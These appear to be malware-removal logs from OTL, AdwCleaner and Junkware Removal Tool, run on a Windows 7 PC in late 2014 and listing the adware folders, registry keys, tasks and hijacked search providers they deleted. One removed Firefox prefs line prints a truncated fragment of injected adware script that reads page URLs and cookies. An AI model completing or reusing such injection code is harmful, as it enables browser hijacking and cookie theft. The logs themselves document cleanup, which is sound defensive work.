C:\Users\BR\AppData\Local\{72283AC5-4FD6-4FCF-ACA7-0F1434D31AA3} folder moved successfully.
C:\Users\BR\AppData\Local\{F06BE51C-24FB-48F9-BA43-A1DD75C7DFDE} folder moved successfully.
C:\Users\BR\AppData\Local\{8C17B09D-3B72-4713-A05F-47A292E98DDB} folder moved successfully.
C:\Users\BR\AppData\Local\{1096C07C-5A4A-4DE5-B6DB-0B2E9D6FB231} folder moved successfully.
C:\Users\BR\AppData\Roaming\BitTorrent\updates folder moved successfully.
C:\Users\BR\AppData\Roaming\BitTorrent\share folder moved successfully.
C:\Users\BR\AppData\Roaming\BitTorrent\ie folder moved successfully.
C:\Users\BR\AppData\Roaming\BitTorrent\dlimagecache folder moved successfully.
C:\Users\BR\AppData\Roaming\BitTorrent\apps\D944B3378FAB35793B7951FA53E41B2AB9CC462B folder moved successfully.
C:\Users\BR\AppData\Roaming\BitTorrent\apps\72F0D3E2141065DACF6134D07A06A2DF20590748 folder moved successfully.
C:\Users\BR\AppData\Roaming\BitTorrent\apps folder moved successfully.
C:\Users\BR\AppData\Roaming\BitTorrent folder moved successfully.
ADS C:\ProgramData\Temp:7A8EE542 deleted successfully.
========== COMMANDS ==========
 
[EMPTYTEMP]
 
User: Administrator
 
User: All Users
 
User: bcom
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes
 
User: BR
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 362206954 bytes
->Java cache emptied: 0 bytes
->FireFox cache emptied: 362122011 bytes
->Flash cache emptied: 99307 bytes
 
User: BRIAN
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Java cache emptied: 0 bytes
->FireFox cache emptied: 0 bytes
->Flash cache emptied: 0 bytes
 
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes
 
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes
 
User: Guest
 
User: LogMeInRemoteUser
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
User: Public
 
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 37159989 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 128 bytes
RecycleBin emptied: 0 bytes
 
Total Files Cleaned = 726.00 mb
 
 
OTL by OldTimer - Version 3.2.69.0 log created on 12312014_101001

Files\Folders moved on Reboot...
C:\Users\BR\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat moved successfully.

PendingFileRenameOperations files...

Registry entries deleted on Reboot...

#2 AdwCleaner log

# AdwCleaner v4.106 - Report created 31/12/2014 at 10:38:45
# Updated 21/12/2014 by Xplode
# Database : 2014-12-30.1 [Live]
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : BR - BRIAN-PC
# Running from : C:\Users\BR\Downloads\AdwCleaner(1).exe
# Option : Clean

***** [ Services ] *****

[#] Service Deleted : Skype C2C Service

***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\Updater
Folder Deleted : C:\Program Files (x86)\predm
Folder Deleted : C:\Users\BR\AppData\Local\Temp\Box Rock
Folder Deleted : C:\Users\Administrator\AppData\Local\Chromatic Browser
Folder Deleted : C:\Users\Administrator\AppData\Local\torch
Folder Deleted : C:\Users\bcom\AppData\Local\Chromatic Browser
Folder Deleted : C:\Users\bcom\AppData\Local\torch
Folder Deleted : C:\Users\BR\AppData\Local\FileTypeAssistant
Folder Deleted : C:\Users\BR\AppData\Local\Mobogenie
Folder Deleted : C:\Users\BR\AppData\LocalLow\HPAppData
Folder Deleted : C:\Users\BR\AppData\Roaming\FirefoxToolbar
Folder Deleted : C:\Users\BR\AppData\Roaming\RHEng
Folder Deleted : C:\Users\BR\Documents\Mobogenie
Folder Deleted : C:\Users\BRIAN\AppData\Local\Chromatic Browser
Folder Deleted : C:\Users\BRIAN\AppData\Local\torch
Folder Deleted : C:\Users\BRIAN\AppData\LocalLow\HPAppData
Folder Deleted : C:\Users\BRIAN\AppData\LocalLow\DownloadManager
Folder Deleted : C:\Users\BRIAN\AppData\LocalLow\Yahoo! Companion
Folder Deleted : C:\Users\Guest\AppData\Local\Chromatic Browser
Folder Deleted : C:\Users\Guest\AppData\Local\torch
File Deleted : C:\END
File Deleted : C:\Users\BR\daemonprocess.txt
File Deleted : C:\Users\BR\AppData\Roaming\Mozilla\Firefox\Profiles\acm539rf.default\invalidprefs.js
File Deleted : C:\Users\BR\AppData\Roaming\Mozilla\Firefox\Profiles\acm539rf.default\searchplugins\bingp.xml
File Deleted : C:\Users\BR\AppData\Roaming\Mozilla\Firefox\Profiles\acm539rf.default\user.js

***** [ Scheduled Tasks ] *****

Task Deleted : Dealply
Task Deleted : RegClean Pro
Task Deleted : LuckyTab

***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MobogenieAdd
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{00B11DA2-75ED-4364-ABA5-9A95B1F5E946}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{5A4E3A41-FA55-4BDA-AED7-CEBE6E7BCB52}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{6E993643-8FBC-44FE-BC85-D318495C4D96}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D2CE3E00-F94A-4740-988E-03DC2F38C34F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{A2D733A7-73B0-4C6B-B0C7-06A432950B66}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D2CE3E00-F94A-4740-988E-03DC2F38C34F}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{D2CE3E00-F94A-4740-988E-03DC2F38C34F}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{54739D49-AC03-4C57-9264-C5195596B3A1}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{D2CE3E00-F94A-4740-988E-03DC2F38C34F}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{5A4E3A41-FA55-4BDA-AED7-CEBE6E7BCB52}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{2830488C-079B-45C2-88B6-AFE4EAA2DF85}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{EE95078D-518C-4FD2-8093-FD1D4E33D3CA}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{F9EB11AB-9384-4736-9B33-993940F88895}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5}
Key Deleted : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9}
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9}
Key Deleted : HKCU\Software\Bitberry
Key Deleted : HKCU\Software\Linkey
Key Deleted : HKCU\Software\Optimizer Pro
Key Deleted : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Key Deleted : HKCU\Software\AppDataLow\Software\SpeeditUp
Key Deleted : HKLM\SOFTWARE\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Deleted : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Key Deleted : HKLM\SOFTWARE\Tutorials
Key Deleted : HKLM\SOFTWARE\VBMZ
Key Deleted : HKLM\SOFTWARE\YourFileDownloader
Key Deleted : HKLM\SOFTWARE\LookSafe
Key Deleted : HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17496


-\\ Mozilla Firefox v34.0.5 (x86 en-US)

[acm539rf.default\prefs.js] - Line Deleted : user_pref("extensions.VRP76tdH9kf0F4HH.scode", "try{(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1url.indexOf(\"warnalert11.com\")>-1url.index[...]
[rvkciqtl.default\prefs.js] - Line Deleted : user_pref("browser.search.selectedEngine", "Astromenda");

-\\ Google Chrome v

[C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
[C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3308759&CUI=UN39024332001555330&UM=2
[C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3308759&CUI=UN39024332001555330&UM=2
[C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=dnldmsd&cd=2XzuyEtN2Y1L1Qzu0EtD0C0ByE0EyB0DyBtBzz0E0CyCtD0EtN0D0Tzu0CyCtBtDtN1L2XzutBtFtBtFyEtFyBtAtCtN1L1Czu1Q1G1I1Q1H1B1Q&cr=1808017157&ir=
[C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://www2.delta-search.com/?q={searchTerms}&babsrc=SP_ss&mntrId=B4182226823EC88F&affID=119357&tsp=4989
[C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://search.conduit.com/Results.aspx?q={searchTerms}&SearchSource=49&CUI=UN34168946517553120&ctid=CT3287810&UM=2
[C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://search.conduit.com/Results.aspx?q={searchTerms}&SearchSource=49&CUI=UN34168946517553120&ctid=CT3287810&UM=2
[C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://search.conduit.com/Results.aspx?q={searchTerms}&SearchSource=49&CUI=UN98968012038931065&ctid=CT3306061&UM=2
[C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://search.conduit.com/Results.aspx?q={searchTerms}&SearchSource=49&CUI=UN98968012038931065&ctid=CT3306061&UM=2
[C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://search.conduit.com/Results.aspx?q={searchTerms}&SearchSource=49&CUI=UN21268665519945131&ctid=CT3311875&UM=2
[C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://search.conduit.com/Results.aspx?q={searchTerms}&SearchSource=49&CUI=UN21268665519945131&ctid=CT3311875&UM=2

*************************

AdwCleaner[R0].txt - [67412 octets] - [25/01/2014 06:57:02]
AdwCleaner[R1].txt - [8414 octets] - [31/12/2014 10:36:20]
AdwCleaner[S0].txt - [67988 octets] - [25/01/2014 06:58:27]
AdwCleaner[S1].txt - [8276 octets] - [31/12/2014 10:38:45]

########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [8336 octets] ##########

#3 Junkware log

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.4.1 (12.28.2014:1)
OS: Windows 7 Home Premium x64
Ran by BR on 31/12/2014 at 10:50:09.37
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services



~~~ Registry Values



~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog\Application\update jump flip



~~~ Files



~~~ Folders

Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{00180381-486C-453D-89A8-411FDE72AFC9}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{0057972F-990C-4F80-881A-AAFA2A76178F}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{0071FDFE-C5BD-4856-AE80-CDE2D036F884}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{00775546-0F64-4105-A3F5-45C570FB967D}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{010A69D0-EE51-4EFD-9A09-24B68DB68FAF}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{011657B1-378F-41E1-8854-3E10C713AF99}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{01257858-C28B-4E86-8BD9-D8D7E2C153D2}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{015C38F8-3060-447F-BCE6-4BF835730C5B}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{017B2449-9353-4532-9435-EE90945367FE}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{02A88CF0-B9A1-426E-BF78-4DF3EF1131FE}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{0314AF66-0907-42D7-9A16-7C0CD660BF31}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{03984779-FEBE-4D77-AC14-47FFA06A2900}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{0469A80C-2018-4B09-8418-E74287669D32}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{04CD8FCB-F042-435E-8ACF-3F5D71BF25F5}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{05E37C09-BDA3-4BCD-A4B0-384BB7D61DC0}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{05EA3CB4-3331-405F-9AD6-CE8D4B750AC4}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{07709586-9943-41A4-B2D9-97CE88039187}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{087DA8A9-7713-47A9-8F77-3D0BFBCC3FBB}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{08844070-6C2C-4D52-9353-0532B3E35A6C}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{08FC9760-515D-4850-B2E7-0766EA491209}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{09869E13-9824-4562-A4C9-60BD665D9582}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{0A039E6D-198B-4FD3-8730-3A2075D20A69}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{0BBA95FA-3301-4964-95F5-48DD5514B5ED}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{0CB09F15-35DF-4A49-AAF5-AB20307D9D30}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{0D43FD6A-1AA2-447B-BA41-1847068DF47B}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{0D956897-EDA2-4149-9C08-AB27D83D5684}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{0D9E0DBC-50B2-48BA-90E3-82469DCEB9D8}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{0DDD7273-FA59-4868-91C3-23022BD6A180}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{0E0C08A0-F931-446C-99A9-79ADEEEB560B}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{0E9DB891-D1CD-45F2-A342-B365F6729639}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{0F8806C8-A2AF-49A5-97B6-47D51942B4D0}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{10FEE935-D208-444F-8912-9B6B177D9344}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{113BEBF6-D5AC-443B-A759-B55F141B30A8}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{1145FBD5-7F58-4C74-8664-CB8CDCAFB71C}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{14218E32-48D1-4385-BD74-A5401C0F2E16}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{1501093F-D5A4-49B8-87A3-4699FC543B67}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{1570724B-0AFC-4117-81EE-864A8DC824D6}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{160B4B22-38F8-4551-BD4D-A3FC6C514971}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{165535C5-CBE2-4A8A-BDE3-068ECB6272CE}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{16E7E407-B81E-44AD-9191-54FB697D5D4E}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{17FC0F50-76AE-437E-BABD-FB812F3E4CE9}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{1889C1A8-5263-4E4B-9A19-675CBB998669}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{19549F46-12DF-4230-9AEF-3AC8D7AA9EC4}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{198AF90A-DA55-45B1-9EE9-E95923B225ED}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{19C0BF48-5C2C-4300-9260-1CD1CDA6052F}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{1A641FFA-F9BE-48AD-AD15-8885642CCB77}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{1BB29FEF-4207-4597-9AB0-1FD9DFA86B1F}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{1C4EED16-F4E0-42F0-9022-AC0D2F3128CF}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{1CECF149-A5B9-408C-82FE-80DEB129743D}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{1FA0E203-020B-4537-8218-4BCE7F2FA46F}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{203419EA-AE3A-4F53-BDA1-74BC2F2E43D1}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{209F901D-6EDA-4934-98E0-8BA3B597A3B8}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{20CDC456-F691-4E6B-AC5E-AB1115216B88}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{21400804-6D1D-4BF0-8028-4104B43C0AD1}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{231900E2-71D0-47E1-BAB1-8122F03C4653}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{2365FE63-366F-4BE2-A509-38E9A3D49BE3}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{23D26DE8-EB52-4DE3-B4E8-11905F0A445F}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{245DE1D0-17F9-404F-8DBB-C570FFE0BED6}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{24C4F5AA-F11A-46DF-A293-2E6B1BB60BD1}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{24CDC3D8-76B0-4E16-A57C-03A32FA217DB}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{254BD342-0EF9-4A61-8C67-60CCBBA517AE}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{27163CDE-DE8C-4673-8C7F-7999A1763B76}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{2739DA11-8364-4541-A6DE-0DEA78247994}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{2777496C-86AD-47CE-B2EC-114E0E5B9CD0}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{2798DF29-FFFE-4FF9-84C3-2FE1F1885937}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{27FFA725-B652-44E9-8579-9D1DAADF6C00}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{281EDC39-14A4-4DBA-8E0F-DD51530F11A2}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{28E66774-49F6-45C9-B1E3-C806223E5B8D}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{290DE03A-FBF6-4F5D-B8F2-0CC34AE4D397}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{2A90FF5A-384B-4D45-9BB4-F72B6F831D5C}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{2ABCCC5E-F3EB-47AC-BEEA-4A44ADE1DEF6}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{2AF079CD-B98E-4303-B220-F98A87B062FA}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{2B056AF6-26B3-4405-8C38-FC4160266A08}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{2B477882-30EF-49C6-9563-215E6327EB7D}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{2BA6423D-F277-453B-9525-AC4C60B32A6C}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{2DAE50DE-A005-419F-9947-A77371D6E756}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{2F902584-4B0B-4A15-A821-2469C8ED21B3}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{2FAB3DF3-30AD-4575-B072-6B1DDC7F9B9E}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{302D2654-5C5D-4464-8BB7-E329D73A80BE}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{3059C20F-2F3F-4A36-879B-C47F0E82DB63}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{3094EE15-120B-452D-A5C4-633F24CCBAE9}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{30D63A92-33AB-4AA3-93C9-1A9532FF224B}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{3165F763-2E45-437E-BF8D-4AF1F6A9E516}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{3282D3D4-7837-4C89-8759-C90714EBFC09}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{32932222-9183-45EF-8F46-B3405EAFE231}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{34DC6B3D-608E-4203-9FD5-30F8B72E5956}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{3783D30A-65E4-4B83-96B5-B837DC6201FC}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{3890660C-F262-47B7-83B7-D8D86FF4D8A3}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{396AA220-E82D-4F5C-A09E-A9FBE3D88DED}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{39A78183-C54E-4202-A5ED-B3A5F45A33D0}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{39D91C2B-50FC-4208-A7CE-AAC446108374}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{39E68699-F224-4658-B742-6F554371C365}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{3A0B8954-C600-4E39-9509-A1B8628545F3}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{3A119370-C53B-4109-969D-E84BFF3CACE2}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{3B91350E-7A3C-4A0D-9656-63E6619AD131}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{3BA5A784-4BA4-40C6-8322-D01DA53BF684}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{3BB4B6C1-161E-4CF6-ACDD-0B8FD950DC9E}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{3C5CB20C-04AC-42D6-AC2B-47138F858DF2}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{3CDC3F52-F743-423A-B334-B31A36318207}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{3CF72BEC-B209-410B-A90C-8EB58F20B5B0}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{3DABCB49-26B9-4867-8130-F266DB05CE55}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{3E525FBB-468F-480D-BF89-003B1EE60F73}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{3F2212B5-15D7-464B-995C-F19A506994E7}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{3F4973F3-52B6-4EF3-BBB2-172A790CD705}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{41466E00-F701-469C-A646-8CBD8B7C04A5}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{425F5EFC-E8BD-4CED-80B4-22C4A4879E3E}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{42719554-1AD2-4745-A25B-B8A7CA2925AD}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{42E2DD7B-EFD7-4CF4-8658-F30AF20BDEE8}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{43A1A756-A855-43AC-8081-5FFBE93A90B0}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{44393172-D510-4763-8F2E-D27FCDDC0695}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{44908744-8320-4995-B275-9734918F71AF}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{4619BB3A-C023-4246-B1DD-18AF3FE2540D}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{480D9437-8B74-43B7-994D-CAD26E3690BE}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{48527F96-4A2B-4AE5-AD7E-35DE113B896B}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{48ACD29A-B483-4200-B5D3-40234B5F0505}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{48B3C20A-94A4-4410-B497-11BC8197B394}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{48F08A2E-2FBD-4FCD-ADDB-E0980D66E1F3}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{48FD055A-81ED-459F-8873-700E73770A1C}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{491986D1-A193-47DF-B5BB-9B1E69F90A63}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{4A599C82-3E7E-4A5C-A679-E98CF44D56C2}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{4AE156D6-8D72-4DCD-832F-D823F219DBD2}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{4BA1FE73-D925-471E-B996-9FABE7DDAE61}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{4BD33D46-0A57-45C9-8133-46D21AD6A248}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{4C16A68F-1D25-4FFB-B0E4-0F455AB407E4}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{4E62464B-A79D-4B6B-AF81-FBD5AE54C44C}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{4F9DC688-6EE7-4ED2-BC78-A0D3B17A8A20}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{501B1D19-0409-48EC-8DBA-7387D46FBDAE}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{50774A68-B845-477A-912A-3A6C8C61F15E}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{50FA9F05-2087-4C8E-A934-24E9A93A51A6}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{51322EF6-B451-4BB5-A7BD-2D5EAC0CDD5D}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{514D6B57-EA2F-443A-86A3-6FCD07E27435}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{51D95AE5-D15C-40C5-9FC9-C2FBB605055D}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{541CE2FD-1F3F-49B0-88DD-F7CC41993E92}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{5436E96C-2CCD-4756-A28A-81A187C1BDA2}
